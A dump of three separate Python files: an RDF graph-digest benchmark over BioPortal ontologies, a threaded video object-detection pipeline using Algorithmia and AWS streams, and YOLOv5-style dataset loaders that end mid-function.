from rdflib import Namespace, Graph
from rdflib.compare import to_isomorphic
from six.moves.urllib.request import urlopen
from six.moves import queue
import sys, csv
from io import StringIO
from collections import defaultdict
from multiprocessing import Process, Semaphore, Queue
bioportal_query = '''
PREFIX metadata: <http://data.bioontology.org/metadata/>
select distinct ?ontology ?title ?download where {
?ontology a metadata:Ontology;
metadata:omvname ?title;
metadata:links ?links.
?links metadata:Ontology ?download.
filter(regex(?download, "/download"))
}
'''
stat_cols = [
'id',
'ontology',
'download_url',
'tree_depth',
'color_count',
'individuations',
'prunings',
'initial_color_count',
'adjacent_nodes',
'initial_coloring_runtime',
'triple_count',
'graph_digest',
'to_hash_runtime',
'canonicalize_triples_runtime',
'error',
]
def files_benchmark(ontologies, output_file, threads):
w = open(output_file, 'w')
writer = csv.DictWriter(w, stat_cols)
writer.writeheader()
tasks = Queue()
finished_tasks = Queue()
dl_lock = Semaphore(4)
task_count = len(ontologies)
def worker(q, finished_tasks, dl_lock):
try:
while True:
stats = q.get()
og = Graph()
try:
og.load(stats['download_url'])
print(stats['ontology'], stats['id'])
ig = to_isomorphic(og)
graph_digest = ig.graph_digest(stats)
finished_tasks.put(stats)
except Exception as e:
print('ERROR', stats['id'], e)
stats['error'] = str(e)
finished_tasks.put(stats)
except queue.Empty:
pass
for i in range(int(threads)):
print("Starting worker", i)
t = Process(target=worker, args=[tasks, finished_tasks, dl_lock])
t.daemon = True
t.start()
for download in ontologies:
stats = defaultdict(str)
stats.update({
"id": download.split("/")[-1].split(".")[0],
"ontology": download.split("/")[-1].split(".")[0],
"download_url": download
})
tasks.put(stats)
tasks.close()
written_tasks = 0
while written_tasks < task_count:
stats = finished_tasks.get()
# print "Writing", stats['ontology']
writer.writerow(stats)
w.flush()
written_tasks += 1
def bioportal_benchmark(apikey, output_file, threads):
metadata = Namespace("http://data.bioontology.org/metadata/")
url = 'http://data.bioontology.org/ontologies?apikey=%s' % apikey
ontology_graph = Graph()
print(url)
ontology_list_json = urlopen(url).read()
ontology_graph.parse(StringIO(unicode(ontology_list_json)), format="json-ld")
ontologies = ontology_graph.query(bioportal_query)
w = open(output_file, 'w')
writer = csv.DictWriter(w, stat_cols)
writer.writeheader()
tasks = Queue()
finished_tasks = Queue()
dl_lock = Semaphore(4)
task_count = len(ontologies)
def worker(q, finished_tasks, dl_lock):
try:
while True:
stats = q.get()
og = Graph()
try:
try:
dl_lock.acquire()
og.load(stats['download_url'] + "?apikey=%s" % apikey)
finally:
dl_lock.release()
print(stats['ontology'], stats['id'])
ig = to_isomorphic(og)
graph_digest = ig.graph_digest(stats)
finished_tasks.put(stats)
except Exception as e:
print('ERROR', stats['id'], e)
stats['error'] = str(e)
finished_tasks.put(stats)
except Empty:
pass
for i in range(int(threads)):
print("Starting worker", i)
t = Process(target=worker, args=[tasks, finished_tasks, dl_lock])
t.daemon = True
t.start()
for ontology, title, download in ontologies:
stats = defaultdict(str)
stats.update({
"id": ontology,
"ontology": title,
"download_url": download
})
tasks.put(stats)
tasks.close()
written_tasks = 0
while written_tasks < task_count:
stats = finished_tasks.get()
# print "Writing", stats['ontology']
writer.writerow(stats)
w.flush()
written_tasks += 1
if __name__ == '__main__':
if len(sys.argv) > 4:
files_benchmark(sys.argv[1:-2], sys.argv[-2], sys.argv[-1])
else:
bioportal_benchmark(sys.argv[1], sys.argv[2], sys.argv[3])
|
process.py
|
from random import uniform
import time
from threading import Thread, Lock
from queue import Queue
import Algorithmia
from src.utils import create_producer, create_consumer, credential_auth
from uuid import uuid4
import json
MAX_SECONDS = 120
class CheckableVariable(object):
def __init__(self, default_value):
self.queue = Queue(1)
self.queue.put(default_value)
self.lock = Lock()
def get(self):
with self.lock:
result = self.queue.get()
self.queue.put(result)
return result
def increment(self, value):
with self.lock:
result = self.queue.get()
self.queue.put(result + value)
def decrement(self, value):
with self.lock:
result = self.queue.get()
self.queue.put(result - value)
class PoolManger(object):
def __init__(self, min_pool, max_pool, increment_size):
self._current_count = CheckableVariable(min_pool)
self._max_count = CheckableVariable(max_pool)
self._unlock = Lock()
self._incr_size = increment_size
def max(self):
return self._max_count.get()
def current(self):
return self._current_count.get()
def acquire(self):
while True:
if not self._unlock.locked() and self.current() < self.max():
break
else:
time.sleep(uniform(0.1, 0.5))
self._unlock.acquire()
self._current_count.increment(1)
def release(self):
try:
self._unlock.release()
except RuntimeError:
pass
def update_max(self):
self._max_count.increment(self._incr_size)
def __enter__(self):
self.acquire()
def __exit__(self, exc_type, exc_val, exc_tb):
self.release()
def wait_to_transform(client, logger, itr, next_input, next_output, fps, time_wait=5):
dataFile = client.file(next_input)
while True:
logger.info("process - {} - woke thread".format(itr))
if dataFile.exists():
break
else:
time.sleep(time_wait)
logger.info("process - {}- processing".format(itr))
result = transform(client, logger, next_input, next_output, fps)
logger.info("process - {} - processed".format(itr))
return result
def transform(client, logger, input_file, output_file, fps):
algo = "deeplearning/ObjectDetectionCOCO/0.3.x"
advanced_input = {
"images": "$BATCH_INPUT",
"outputs": "$BATCH_OUTPUT",
"model": "ssd_mobilenet_v1",
"minscore": "0.7"
}
input = {
"input_file": input_file,
"output_file": output_file,
"algorithm": algo,
"advanced_input": advanced_input,
"fps": fps,
}
try:
result = client.algo('media/videotransform?timeout=3000').pipe(input).result
return result['output_file']
except Exception as e:
logger.info(e)
return None
def process(logger, client, feeder_q, processed_q, thread_locker, remote_format, fps):
with thread_locker:
logger.info("process - {}/{} threads unlocked".format(str(thread_locker.current()), str(thread_locker.max())))
while True:
while feeder_q.empty():
time.sleep(0.25)
data = feeder_q.get()
itr = data['itr']
input_url = data['url']
remote_path = "{}/{}.mp4".format(remote_format, str(uuid4()))
algorithm_response = wait_to_transform(client, logger, itr, input_url, remote_path, fps, time_wait=1)
if algorithm_response:
data = {itr: algorithm_response}
logger.info("process - pushing {} to publishing queue..".format(itr))
processed_q.put(data)
else:
logger.info("process - skipping {} due to exception...".format(itr))
def consume(logger, aws_creds, work1_q, work2_q, input_stream):
session = credential_auth(aws_creds)
consumer = create_consumer(input_stream, session)
logger.info("input - starting to consume...")
for message in consumer:
work1_q.put(json.loads(message['Data']))
work2_q.put(json.loads(message['Data']))
logger.info("input - got message and queued")
def unlocker(thread_locker):
while True:
t = time.time()
while time.time() - t < 30:
time.sleep(0.25)
try:
thread_locker.release()
except:
pass
def publish(logger, aws_creds, output_stream, work_completed_queue, input_secondary_queue, thread_locker, fps):
session = credential_auth(aws_creds)
producer = create_producer(output_stream, session)
cutoff = None
videos_per_publish = int(MAX_SECONDS / fps)
buffer = {}
originals_buffer = {}
t = time.time()
logger.info("output - waiting {}s before starting publishing".format(str(MAX_SECONDS*2)))
while time.time() - t < MAX_SECONDS*2:
time.sleep(0.25)
t = time.time()
logger.info("output - starting publishing system...")
while True:
while work_completed_queue.empty() and input_secondary_queue.empty() and time.time() - t < MAX_SECONDS:
time.sleep(0.25)
transformed_indicies = list(buffer.keys())
if not input_secondary_queue.empty():
data = input_secondary_queue.get()
itr = data['itr']
if not cutoff:
cutoff = int(itr)
original_url = data['url']
originals_buffer[itr] = original_url
if not work_completed_queue.empty():
data = work_completed_queue.get()
key = list(data.keys())[0]
if int(key) >= cutoff:
buffer[key] = data[key]
logger.info("output - transformed - {} - {}".format(transformed_indicies, cutoff))
else:
logger.info("output - {} is not greater than current cursor, ignoring...".format(key))
if time.time() - t >= MAX_SECONDS:
logger.info("output - {} - {}".format(transformed_indicies, videos_per_publish))
transformed_indicies.sort()
shippable_buffer = []
increase_threads_signal = False
logger.info("output - pushing {}s of content to publishing buffer...".format(str(MAX_SECONDS)))
for i in range(cutoff, cutoff + videos_per_publish):
if i in transformed_indicies:
packaged = {"itr": i, "url": buffer[i], "type": "transform"}
del buffer[i]
elif i in originals_buffer:
packaged = {"itr": i, "url": originals_buffer[i], "type": "original"}
del originals_buffer[i]
else:
packaged = {'itr': i, "url": None, "type": None}
logger.info("output - packaging -{}".format(packaged))
shippable_buffer.append(packaged)
shippable_buffer = sorted(shippable_buffer, key=lambda k: k['itr'])
for next_item in shippable_buffer:
if next_item['type'] == "original":
increase_threads_signal = True
logger.info("output - shipping {}".format(next_item))
producer.put(json.dumps(next_item))
logger.info("output - finished publishing")
if increase_threads_signal:
thread_locker.update_max()
cutoff = cutoff + videos_per_publish
t = time.time()
class Logger:
def __init__(self):
self.q = Queue()
def info(self, message):
self.q.put(message)
def read_next(self):
next_message = self.q.get()
print(next_message, flush=True)
def processor(algorithmia_api_key, aws_creds, initial_pool, input_stream_name, output_stream_name,
data_collection, fps, algo_address=None):
logger = Logger()
if algo_address:
client = Algorithmia.client(algorithmia_api_key, api_address=algo_address)
else:
client = Algorithmia.client(algorithmia_api_key)
print("starting process", flush=True)
input1_q = Queue(500)
input2_q = Queue(500)
processed_q = Queue(500)
thread_locker = PoolManger(0, initial_pool, 2)
consume_t = [Thread(target=consume, args=(logger, aws_creds, input1_q, input2_q, input_stream_name))]
publish_t = [Thread(target=publish, args=(logger, aws_creds, output_stream_name, processed_q, input2_q, thread_locker, fps))]
unlocker_t = [Thread(target=unlocker, args=(thread_locker,))]
threads = [Thread(target=process, args=(logger, client, input1_q, processed_q, thread_locker, data_collection, fps)) for
_ in range(100)]
threads += consume_t + publish_t + unlocker_t
[thread.start() for thread in threads]
while True:
logger.read_next()
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from yolov5processor.utils.general import xyxy2xywh, xywh2xyxy, torch_distributed_zero_first
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.tiff', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache.
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
rank=rank)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
dataloader = InfiniteDataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers.
Uses same syntax as vanilla DataLoader.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', self._RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever.
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception('ERROR: %s does not exist' % p)
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(p, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nf, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nf, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, rank=-1):
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = str(Path(p)) # os-agnostic
parent = str(Path(p).parent) + os.sep
if os.path.isfile(p): # file
with open(p, 'r') as t:
t = t.read().splitlines()
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
elif os.path.isdir(p): # folder
f += glob.iglob(p + os.sep + '*.*')
else:
raise Exception('%s does not exist' % p)
self.img_files = sorted(
[x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats])
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt') for x in
self.img_files]
# Check cache
cache_path = str(Path(self.label_files[0]).parent) + '.cache' # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Get labels
labels, shapes = zip(*[cache[x] for x in self.img_files])
self.shapes = np.array(shapes, dtype=np.float64)
self.labels = list(labels)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
pbar = enumerate(self.label_files)
if rank in [-1, 0]:
pbar = tqdm(pbar)
for i, file in pbar:
l = self.labels[i] # label
if l is not None and l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
if rank in [-1, 0]:
pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
cache_path, nf, nm, ne, nd, n)
if nf == 0:
s = 'WARNING: No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
print(s)
assert not augment, '%s. Can not train without labels.' % s
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache'):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for (img, label) in pbar:
try:
l = []
image = Image.open(img)
image.verify() # PIL verify
# _ = io.imread(img) # skimage verify (from skimage import io)
shape = exif_size(image) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
if os.path.isfile(label):
with open(label, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
x[img] = [None, None]
print('WARNING: %s: %s' % (img, e))
x['hash'] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
